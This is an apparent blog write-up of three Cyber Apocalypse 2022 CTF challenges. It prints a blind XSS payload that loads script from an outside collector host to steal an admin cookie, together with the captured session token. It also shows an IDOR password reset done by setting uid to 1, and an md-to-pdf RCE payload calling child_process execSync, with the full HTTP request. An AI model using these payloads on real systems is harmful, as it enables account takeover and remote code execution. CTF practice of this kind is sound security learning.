Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up

1 year ago 141
BOOK THIS SPACE FOR AD
ARTICLE AD

https://ctf.hackthebox.com/static/ca/cyber_apocalypse_2022_ca.jpg

Hello everyone I am Hac and today we are doing Cyber Apocalypse CTF 2022 , Specifically this challenges :-

- Kryptos Support (Web)
- BlinkerFluids (web)
- Compressor (Misc)

We will first start with Kryptos Support (Web) . Let’ s go ………

On visiting the page , We see that there is and input field where we can give some input after that it’s checked by the admin (it’s like a reporting system where our report will be checked by the admin user or some other group of user ) .

I was wondering what I can do with this , I have played good amount of CTF’s (still a noob) So I thought to try XSS but not your traditional alert(1) , Since things are not happening at our side we need to know whether our payload is working or not . That’s why I am using XSShunter there are other-ways to do this work but I will stick with XSShunter . This is our payload 🢃

"><script src=https://someone-in-somewhere-redacted.com></script>

And boom our XSS payload fired I was wondering what I can do from here ? One thing was really interesting for me we are able to get cookie . Which could be of admin or some other user with same or slightly lower privilege .

Since we don't have any cookie at our side that’s why cookie was interesting to me .

##### Cookies (Non-HTTPOnly)
`session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1MzQ4ODV9.JO12yEA44QxXgfUmL3n6Sm4Et2AJc5rkvXkvSMdmFOI`

Now we can add that cookie in our browser .

adding cookie

After that we will navigate to /tickets (Thanks to my amazing team member KDirectorate) .

I was wondering what i can do here the page seems to be static (except few stuff) . I tried /rfid/somenumbers and all but no luck

Then one of my team mate (KDirectorate) said to “check /setting which has password reset functionality ” which was really interesting . I navigated to /setting and intercepted the response in burp suite .

There was the filed one was “password” and othere was “uid” (which was like username ) .

Then I thought what if I change to value of uid with 1 ? ( Most of the time 1=admin)

And boom I was able to change password of admin . After that I tried to login as admin and I was successful .

In this challenge there is a RCE in md-to-pdf which we will use to get the flag (Thanks KDirectorate ) If we check challenge file we will come across 🢃

'--no-sandbox', '--js-flags=--noexpose_wasm,--jitless

Here no “ — no-sandbox ” means that we have access to host environment .

Some resources which i used to learn about this exploit

So we will intercept the response in burp suite and I will add my payload .

---js\n((require('child_process')).execSync('id > /tmp/RCE.txt'))\n---RCE

And we are able to execute our code

POST /api/invoice/add HTTP/1.1
Host: 46.101.27.51:32374
Content-Length: 24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://46.101.27.51:32374
Referer: http://46.101.27.51:32374/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
{"markdown_content":"---js\n((require('child_process')).execSync('ls > static/RCE.txt'))\n---RCE"}

We can get flag by simple enumeration .

Compressor (Misc)

In this challenge we will take advantage of command injection to get flag .

This one is easy so I will go quick

we are able to execute different command and with simple enumeration we can find the flag .

Read Entire Article